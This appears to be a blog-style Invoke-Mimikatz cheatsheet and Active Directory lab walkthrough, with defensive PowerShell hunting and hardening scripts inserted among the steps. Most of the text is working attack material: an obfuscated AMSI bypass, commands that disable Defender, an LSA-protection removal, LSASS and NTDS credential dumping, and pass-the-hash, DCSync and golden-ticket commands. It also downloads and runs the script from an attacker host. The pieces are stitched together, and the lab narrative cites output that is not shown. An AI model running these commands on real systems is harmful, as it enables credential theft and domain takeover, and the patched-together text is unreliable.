Invoke-Mimikatz

Today we are going to be looking at Invoke-Mimikatz which can be found here:

https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1

https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/refs/heads/master/Exfiltration/Invoke-Mimikatz.ps1

I think I have solved it: Exception calling "GetMethod" with "1" argument(s): "Ambiguous match found."

Change the following line:
$GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress')

To

$GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress', [reflection.bindingflags] "Public,Static", $null, [System.Reflection.CallingConventions]::Any, @((New-Object System.Runtime.InteropServices.HandleRef).GetType(), [string]), $null);

This solves the issue with Win11


1. Preparation and Environment Setup

Run PowerShell as Administrator and prepare your environment:

Start-Process PowerShell_ISE -Verb RunAs
Add-MpPreference -ExclusionPath "C:\Temp"
Set-MpPreference -DisableRealtimeMonitoring $true
Import-Module C:\Temp\Invoke-Mimikatz.ps1

If Defender can’t be turned off, use AMSI bypass:

S`eT-It`em ( ‘V’+’aR’ + ‘IA’ + (‘blE:1’+’q2') + (‘uZ’+’x’) ) ( [TYpE]( “{1}{0}”-F’F’,’rE’ ) ) ; ( Get-varI`A`BLE ( (‘1Q’+’2U’) +’zX’ ) -VaL ).”A`ss`Embly”.”GET`TY`Pe”(( “{6}{3}{1}{4}{2}{0}{5}” -f(‘Uti’+’l’),’A’,(‘Am’+’si’),(‘.Man’+’age’+’men’+’t.’),(‘u’+’to’+’mation.’),’s’,(‘Syst’+’em’) ) ).”g`etf`iElD”( ( “{0}{2}{1}” -f(‘a’+’msi’),’d’,(‘I’+’nitF’+’aile’) ),( “{2}{4}{0}{1}{3}” -f (‘Non’+’Publ’+’i’),’c’,’c,’ )).”sE`T`VaLUE”( ${n`ULl},${t`RuE} )

2. Bypass LSA Protection (if necessary)

If Mimikatz throws:

ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)

Try this:

Loading the mimidrv Driver into Memory

mimikatz # !+
[*] 'mimidrv' service not present
[+] 'mimidrv' service successfully registered
[+] 'mimidrv' service ACL to everyone
[+] 'mimidrv' service started

mimikatz #

Removing the LSA Protection

mimikatz # !processprotect /process:lsass.exe /remove
Process : lsass.exe
PID 528 -> 00/00 [0-0-0]

3. Dumping Credentials (Basic)

Invoke-Mimikatz -Command '"token::elevate" "privilege::debug" "sekurlsa::logonpasswords"'
evil-winrm-py PS C:\programdata> Invoke-Mimikatz -Command '"token::elevate" "privilege::debug" "sekurlsa::logonpasswords"'

  .#####.   mimikatz 2.1 (x64) built on Nov 10 2016 15:31:14
 .## ^ ##.  "A La Vie, A L'Amour"
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                     with 20 modules * * */

mimikatz(powershell) # token::elevate
Token Id  : 0
User name :
SID name  : NT AUTHORITY\SYSTEM

584     38654           NT AUTHORITY\SYSTEM     S-1-5-18        (04g,21p)       Primary
 -> Impersonated !
 * Process Token : 14772731     OFFICE\Administrator    S-1-5-21-1199398058-4196589450-691661856-500    (16g,26p)       Primary
 * Thread Token  : 27018955     NT AUTHORITY\SYSTEM     S-1-5-18        (04g,21p)       Impersonation (Delegation)

mimikatz(powershell) # privilege::debug
Privilege '20' OK

Check Credential Manager:

Invoke-Mimikatz -Command '"vault::cred /patch"'
Invoke-Mimikatz -Command '"sekurlsa::credman"'

Other modules:

Invoke-Mimikatz -Command '"lsadump::sam"'
Invoke-Mimikatz -Command '"lsadump::cache"'

4. Pass-The-Hash (PTH)

Invoke-Mimikatz -Command '"sekurlsa::pth /user:administrator /domain:corp.local /ntlm:<NTLM_HASH> /run:powershell_ise.exe"'

5. Pass-The-Ticket (PTT)

Export tickets:

Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'

Inject ticket:

Invoke-Mimikatz -Command '"kerberos::ptt .\ticket.kirbi"'

View or clear tickets:

klist
klist purge

6. Remote Credential Dumping

Invoke-Command -ScriptBlock {Set-MpPreference -DisableRealtimeMonitoring $true} -ComputerName TargetHost
Invoke-Mimikatz -DumpCreds -ComputerName TargetHost

7. DCSync Attack

Dump krbtgt hash:

Invoke-Mimikatz -Command '"lsadump::dcsync /domain:corp.local /user:corp\\krbtgt"'

Dump all domain hashes:

Invoke-Mimikatz -Command '"token::elevate" "privilege::debug" "lsadump::dcsync /domain:test.local /all /csv"' | Export-Csv .\AllHashes.csv
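From the defender's side, DCSync is visible on the Domain Controller as Security event 4662 with replication control-access rights exercised by an account that is not another DC. The following hunting function is an added example (my code, not from the page or PowerSploit) and assumes the "Audit Directory Service Access" subcategory is enabled so 4662 is written.

```powershell
# Added example (not from the page): on a Domain Controller, find Security 4662
# events where directory replication rights were exercised by something other
# than another DC, which is what lsadump::dcsync looks like in the logs. Assumes
# the "Audit Directory Service Access" subcategory is enabled so 4662 is written.
function Find-DcSyncEvents {
    param([int]$Hours = 24)

    # Control-access right GUIDs requested by replication (the DCSync signature).
    $replGuids = @(
        '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2',   # DS-Replication-Get-Changes
        '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2',   # DS-Replication-Get-Changes-All
        '89e95b76-444d-4c62-991a-0facbeda640c'    # DS-Replication-Get-Changes-In-Filtered-Set
    )

    Get-WinEvent -FilterHashtable @{
            LogName = 'Security'; Id = 4662; StartTime = (Get-Date).AddHours(-$Hours)
        } -ErrorAction SilentlyContinue | ForEach-Object {
            # Flatten <EventData> into a name -> value hashtable.
            $x = [xml]$_.ToXml()
            $d = @{}
            $x.Event.EventData.Data | ForEach-Object { $d[$_.Name] = $_.'#text' }

            $props = ("$($d.Properties)").ToLower()
            $hits  = @($replGuids | Where-Object { $props -like "*$_*" })

            # Replication by another DC is routine: its computer account ends in '$'.
            if ($hits.Count -gt 0 -and "$($d.SubjectUserName)" -notlike '*$') {
                [pscustomobject]@{
                    Time   = $_.TimeCreated
                    User   = "$($d.SubjectDomainName)\$($d.SubjectUserName)"
                    Rights = ($hits -join ', ')
                }
            }
        }
}

Find-DcSyncEvents -Hours 24 | Format-Table -AutoSize
```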

8. Golden Ticket Forging

Invoke-Mimikatz -Command '"kerberos::golden /domain:corp.local /sid:S-1-5-21-XXXX /krbtgt:<hash> /user:Administrator /id:500 /ptt"'

To save and reuse the ticket later:

kerberos::golden /ticket:golden.kirbi
kerberos::ptt golden.kirbi

9. Trust Escalation via Golden Ticket

Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:child.local /sid:<child_sid> /sids:<parent_sid>-519 /krbtgt:<hash> /ticket:trust_tkt.kirbi"'
Invoke-Mimikatz -Command '"kerberos::ptt trust_tkt.kirbi"'

10. MiniDump LSASS Without Touching LSASS Directly

rundll32.exe C:\windows\system32\comsvcs.dll, MiniDump <LSASS_PID> C:\Temp\lsass.dmp full

Then in Mimikatz:

sekurlsa::minidump C:\Temp\lsass.dmp
sekurlsa::logonpasswords
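Both the direct sekurlsa::logonpasswords path and the comsvcs.dll MiniDump variant leave handle-open and process-creation traces. The hunting function below is an added example (my code, not from the page or PowerSploit); it assumes Sysmon is installed (Event ID 10, ProcessAccess) and that process command-line auditing is enabled so Security 4688 carries the command line.

```powershell
# Added example (not from the page or PowerSploit): hunt for the LSASS-access
# patterns this cheatsheet produces, using event sources a defender usually has.
# Assumes Sysmon is installed (Event ID 10, ProcessAccess) and that process
# command-line auditing is enabled so Security 4688 carries the command line.
function Find-LsassAccessEvents {
    param([int]$Hours = 24)
    $since = (Get-Date).AddHours(-$Hours)

    # GrantedAccess masks typical of reading LSASS memory: 0x1010 and 0x1410 are
    # the masks sekurlsa requests, 0x1fffff is PROCESS_ALL_ACCESS.
    $suspectMasks = @('0x1010', '0x1410', '0x1438', '0x143a', '0x1fffff')

    # Flatten an event's <EventData> into a name -> value hashtable.
    function ConvertTo-EventData($Event) {
        $d = @{}
        ([xml]$Event.ToXml()).Event.EventData.Data | ForEach-Object { $d[$_.Name] = $_.'#text' }
        $d
    }

    $fromSysmon = Get-WinEvent -FilterHashtable @{
            LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 10; StartTime = $since
        } -ErrorAction SilentlyContinue | ForEach-Object {
            $d = ConvertTo-EventData $_
            $mask = ("$($d.GrantedAccess)").ToLower()
            if ("$($d.TargetImage)" -like '*\lsass.exe' -and $suspectMasks -contains $mask) {
                [pscustomobject]@{ Time = $_.TimeCreated; Source = 'Sysmon 10'
                                   Image = $d.SourceImage; Detail = "GrantedAccess=$mask" }
            }
        }

    # Security 4688: the comsvcs.dll MiniDump trick from step 10, plus direct
    # Invoke-Mimikatz / sekurlsa invocations, matched on the logged command line.
    $fromSecurity = Get-WinEvent -FilterHashtable @{
            LogName = 'Security'; Id = 4688; StartTime = $since
        } -ErrorAction SilentlyContinue | ForEach-Object {
            $d = ConvertTo-EventData $_
            $cmd = "$($d.CommandLine)"
            if ($cmd -match 'comsvcs(\.dll)?\s*,\s*MiniDump' -or $cmd -match 'sekurlsa::|Invoke-Mimikatz') {
                [pscustomobject]@{ Time = $_.TimeCreated; Source = 'Security 4688'
                                   Image = $d.NewProcessName; Detail = $cmd }
            }
        }

    @($fromSysmon) + @($fromSecurity) | Sort-Object Time
}

Find-LsassAccessEvents -Hours 48 | Format-Table -AutoSize
```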

11. Check LSA Protection Status

reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v RunAsPPL

If the value is 0x1, protection is enabled.
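As an added complement to that one-line check (my code, not the page's or PowerSploit's), the script below audits the registry settings that decide whether LSASS memory is readable at all and can turn RunAsPPL on. It assumes an elevated session; the WDigest and LsaCfgFlags values are Microsoft's documented ones, not taken from the page.

```powershell
# Added example (not from the page): audit the registry settings that decide
# whether LSASS memory is readable the way sekurlsa::logonpasswords relies on,
# and enable RunAsPPL. Paths and values are Microsoft's documented ones; run elevated.
function Get-LsassHardeningStatus {
    $lsa     = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
    $wdigest = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest'

    # Read a DWORD value, returning $null when it does not exist.
    function Read-Dword([string]$Path, [string]$Name) {
        try { (Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop).$Name } catch { $null }
    }

    $runAsPpl = Read-Dword $lsa 'RunAsPPL'                # 1 = PPL on (the page's check); 2 also means on from Win11 22H2
    $lsaCfg   = Read-Dword $lsa 'LsaCfgFlags'             # 1 or 2 = Credential Guard configured
    $wdigestC = Read-Dword $wdigest 'UseLogonCredential'  # 1 = WDigest keeps plaintext passwords in LSASS

    [pscustomobject]@{
        RunAsPPL               = $runAsPpl
        LsassIsPPL             = ($null -ne $runAsPpl -and $runAsPpl -ne 0)
        CredentialGuard        = ($null -ne $lsaCfg -and $lsaCfg -ne 0)
        WDigestPlaintextCached = ($wdigestC -eq 1)
        # A RunAsPPL change applies only after a reboot, so report the last boot
        # next to the registry state to spot "set but not yet effective".
        LastBoot               = (Get-CimInstance Win32_OperatingSystem).LastBootUpTime
    }
}

function Enable-LsassPPL {
    # Sets RunAsPPL=1 and stops WDigest caching plaintext; reboot for full effect.
    Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' `
        -Name 'RunAsPPL' -Value 1 -Type DWord
    Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' `
        -Name 'UseLogonCredential' -Value 0 -Type DWord
}

Get-LsassHardeningStatus
```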

12. Obfuscated Invoke-Mimikatz for AV Evasion

Download and run:

IEX (New-Object Net.WebClient).DownloadString('http://<yourhost>/Invoke-Mimikatz.ps1')

Then call commands in obfuscated way:

Invoke-Mimikatz -Command ([string]::Join(' ', @('"privilege::debug"', '"sekurlsa::logonpasswords"')))

13. Dump Credentials via Volume Shadow Copy

Create shadow copy:

wmic shadowcopy call create Volume='C:\'

Find available shadow copies:

vssadmin list shadows

Copy NTDS and SYSTEM:

copy "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyX\Windows\NTDS\ntds.dit" C:\Temp\ntds.dit
copy "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyX\Windows\System32\config\SYSTEM" C:\Temp\SYSTEM

Parse using impacket:

secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL

14. Beyond Mimikatz: Tools Worth Knowing

  • SafetyKatz: obfuscated Mimikatz variant designed to bypass modern EDR solutions.
  • Rubeus: Kerberos abuse toolkit for ticket extraction, overpass-the-hash, and more.
  • PEASS-ng: privilege escalation enumeration suite (WinPEAS and LinPEAS).
  • Seatbelt: post-exploitation tool for situational awareness and system reconnaissance.
  • Ligolo-ng: reverse tunneling tool used to establish SOCKS proxies and pivot during red team operations.

15. [Advanced] Understanding LSA Protection in Kernel

Sometimes when running Mimikatz to dump LSASS credentials, you may encounter the following error:

ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)

This typically happens because LSASS is protected using a mechanism called LSA Protection, which prevents even local administrators from accessing LSASS memory directly.

Why This Happens

At the kernel level, each process in Windows has a structure called EPROCESS, and inside it there is a field named Protection. This field defines the Protection Level of the process (such as “Protected Process” or “Protected Light”).

With LSA Protection enabled, LSASS runs as a Protected Process Light (PPL), which is why Mimikatz, unless it is running from an equally trusted context, is denied access.

How to Remove LSA Protection (Kernel-Level)

If you have access to a kernel debugger (e.g., WinDbg), you can manually remove this protection:

Get LSASS EPROCESS structure:

Run the following in WinDbg:

!process 0 0 lsass.exe

Note the address of the LSASS EPROCESS.

View protection level:

Run:

dt nt!_EPROCESS <lsass_eprocess_address> Protection

Patch the protection field:

Overwrite the protection byte with:

eb <lsass_eprocess_address + offset> 0x00

Get the structure of PS_PROTECTION to understand what the byte represents:

Run:

dt nt!_PS_PROTECTION

After this, Mimikatz should be able to access LSASS and dump credentials normally.
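To make the byte returned by the dt commands above readable without a debugger session, here is an added decoder (my code, not from the page) that applies the _PS_PROTECTION bit layout: Type in bits 0-2, Audit in bit 3, Signer in bits 4-7.

```powershell
# Added example (not from the page): decode the _PS_PROTECTION byte shown by
# "dt nt!_EPROCESS <addr> Protection". Bit layout from the structure:
#   bits 0-2  Type   (PS_PROTECTED_TYPE)      bit 3  Audit
#   bits 4-7  Signer (PS_PROTECTED_SIGNER)
function ConvertFrom-PsProtection {
    param([Parameter(Mandatory)][byte]$Level)

    $types   = @('None', 'ProtectedLight', 'Protected')
    $signers = @('None', 'Authenticode', 'CodeGen', 'Antimalware', 'Lsa',
                 'Windows', 'WinTcb', 'WinSystem', 'App')

    $typeIdx   = $Level -band 0x07
    $auditBit  = ($Level -shr 3) -band 0x01
    $signerIdx = ($Level -shr 4) -band 0x0F

    $typeName   = if ($typeIdx   -lt $types.Count)   { $types[$typeIdx] }     else { "Unknown($typeIdx)" }
    $signerName = if ($signerIdx -lt $signers.Count) { $signers[$signerIdx] } else { "Unknown($signerIdx)" }

    [pscustomobject]@{
        Level  = ('0x{0:X2}' -f $Level)
        Type   = $typeName
        Audit  = [bool]$auditBit
        Signer = $signerName
        # Any non-zero Type is enough to make OpenProcess(PROCESS_VM_READ) fail
        # for an ordinary administrator, which is the 0x00000005 error above.
        BlocksAdminRead = ($typeIdx -ne 0)
    }
}

ConvertFrom-PsProtection 0x41   # LSASS under RunAsPPL: ProtectedLight, signer Lsa
ConvertFrom-PsProtection 0x31   # Defender's MsMpEng.exe: ProtectedLight, signer Antimalware
ConvertFrom-PsProtection 0x00   # what the "eb ... 0x00" step writes: no protection
```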

Final Notes

  • Always run with highest possible privileges (Administrator or SYSTEM)
  • Avoid touching LSASS directly unless needed — prefer DCSync or VSS
  • Test everything in a lab before using in real assessments
  • Use logging, OPSEC, and live off the land when possible

Thanks for reading. This cheatsheet is the result of multiple real-world labs, including CRTP and AD-focused simulations. It’s designed to be minimal, actionable, and practical.


For this lab we will be using a Domain Controller and also a Windows 10 machine that is part of the domain. Both have Windows Defender and Real Time Protection turned on.

If we did want to disable Defender we would run:

PS> Set-MpPreference -DisableIOAVProtection $true

We will start as an administrator on the Windows 10 machine. This is not a privilege escalation walkthrough, just a quick demonstration of Invoke-Mimikatz.ps1.

As stated, we will start off with administrator access on the Windows 10 machine. Also notice that this is a local administrator, not a domain administrator.

Load Invoke-Mimikatz.ps1 into memory with:

iex (iwr -UseBasicParsing http://10.10.14.5/Invoke-Mimikatz.ps1)

evil-winrm-py PS C:\Users\Administrator\Documents> iex (iwr -UseBasicParsing http://10.10.14.5/Invoke-Mimikatz.ps1)
evil-winrm-py PS C:\Users\Administrator\Documents> invoke-mimikatz

  .#####.   mimikatz 2.1 (x64) built on Nov 10 2016 15:31:14
 .## ^ ##.  "A La Vie, A L'Amour"
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                     with 20 modules * * */

mimikatz(powershell) # sekurlsa::logonpasswords
ERROR kuhl_m_sekurlsa_acquireLSA ; Logon list

mimikatz(powershell) # exit
Bye!

evil-winrm-py PS C:\Users\Administrator\Documents>

The first thing we can run is token::elevate:

Now that we have put Mimikatz into memory we can start to look at some of the different commands. Let's start off with just Invoke-Mimikatz:

Now let's look only at the LSA dump. We will be stringing two commands together for this, looking at both the plain LSA dump and the LSA dump with /patch. To do this we can run Invoke-Mimikatz -Command '"lsadump::lsa" "lsadump::lsa /patch"'.

Notice that when we do this both commands are run; we can continue to string more commands together if we please. Next, let's look at the vault. To do this we will be using vault::list, vault::cred and vault::cred /patch.

Notice above that there is nothing in the vault that we can use. That is fine; we still have plenty of information from the other commands to work with. Also, thinking back to the commands we just ran, we could prefix each of them with token::elevate if we wanted, and string other commands with it.

Now that we have run a few commands and seen that we can string them together, let's use the information we found above to do a pass-the-hash with Invoke-Mimikatz.

The command above will open a new PowerShell window, and we can see if we have successfully passed the hash by looking at the domain controller.

Awesome, we are now using pass-the-hash and are an administrator on the Domain Controller, easy day. If you are confused about the domain name or computer name, we found this information earlier with Mimikatz and the commands we have already run:

Notice the logon server is the computer name of the Domain Controller and the domain is the domain name.

Continuing on, let's try to create a golden ticket:

Awesome, it worked, but we were on the DC already. Let's create one for the Windows 10 machine and then see if we can log in with the ticket that we created:

Awesome, we were able to create another session with a golden ticket using the Windows 10 machine and the information that we found on the DC. We have now created persistence within the domain.

As shown throughout this article, we can use Invoke-Mimikatz.ps1 the same way we run mimikatz.exe; however, with the .ps1 we can load it into memory, which helps with bypassing Defender and Real-Time Monitoring.